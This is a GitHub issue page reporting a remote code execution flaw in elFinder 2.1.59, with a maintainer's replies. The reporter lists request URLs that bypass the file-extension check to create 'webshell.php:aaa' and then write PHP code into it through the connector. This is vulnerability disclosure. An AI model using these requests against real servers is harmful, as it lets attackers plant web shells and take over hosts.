-
Notifications
You must be signed in to change notification settings - Fork 1.4k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
RCE elFinder 2.1.59 #3429
Comments
We cannot create such a file with the default configuration.
then got result was
on XAMPP for Windows 7.3.11 |
now open : |
ah I see. understood. Hmmm, I know there are some madcap people who use XAMPP as a public server. I have to fix it. Hah. |
@Ph33rr I am very grateful for your contribution! 👍 |
Hello there |
Describe the bug
bypass ext check
Steps to reproduce the behavior:
http://127.0.0.1/elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=webshell.php:aaa
2.Hash file :
http://127.0.0.1/2/elFinder/php/connector.minimal.php?cmd=open&target=l1_
3.Add PHP code in webshell.php
http://127.0.0.1/2/elFinder/php/connector.minimal.php?cmd=put&content=jpeg<?php echo $_GET["infosec_90"]&target=HashFile
p (please complete the following information):**
The text was updated successfully, but these errors were encountered: